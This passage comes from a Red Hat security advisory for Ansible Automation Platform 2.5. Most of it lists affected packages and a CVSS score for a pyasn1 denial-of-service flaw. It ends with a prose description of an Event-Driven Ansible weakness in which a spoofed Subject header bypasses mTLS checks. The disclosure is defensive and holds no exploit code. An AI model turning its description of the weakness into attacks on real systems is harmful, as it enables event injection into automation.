"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pyasn1: pyasn1: Denial of Service via crafted ASN.1 REAL values"
}
]
}
RHSA-2026:50336
Vulnerability from csaf_redhat - Published: 2026-08-04 18:56 - Updated: 2026-08-05 04:56A flaw was found in the Event-Driven Ansible (EDA) server. The ExternalEventStreamViewSet uses permissive access controls (permission_classes=[AllowAny], authentication_classes=[]) and relies solely on the Subject HTTP header value for mTLS authentication without verifying that the header originated from a trusted proxy. Additionally, the expected certificate Distinguished Name is leaked in the 403 error response body. An attacker who can reach the EDA API endpoint with a spoofed Subject header can inject arbitrary events into mTLS-protected event streams, triggering downstream automation actions.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
